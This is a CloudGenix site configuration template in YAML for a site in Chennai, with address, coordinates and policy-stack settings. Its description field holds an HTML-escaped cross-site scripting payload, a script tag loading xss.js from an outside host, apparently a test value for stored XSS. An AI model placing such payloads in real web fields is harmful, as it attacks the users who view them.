---
type: cloudgenix template
version: 1.0
# Created at 2020-10-05T12:26:59.007211Z
# by system_2750@soumyars.com
sites v4.5:
  CHENNAI_SITE:
    address:
      city: Chennai
      country: India
      post_code:
      state:
      street:
      street2:
    admin_state: disabled
    description: '&lt;SCRIPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;'
    element_cluster_role: SPOKE
    elements v2.3: {}
    extended_tags:
    location:
      description:
      latitude: 13.09000015258789
      longitude: 80.27999877929688
    nat_policysetstack_id: Default-NATPolicySetStack
    network_policysetstack_id: NetworkPolicySetStack
    policy_set_id:
    priority_policysetstack_id: PriorityPolicySetStack
    security_policyset_id:
    service_binding: Preset Domain
    tags:
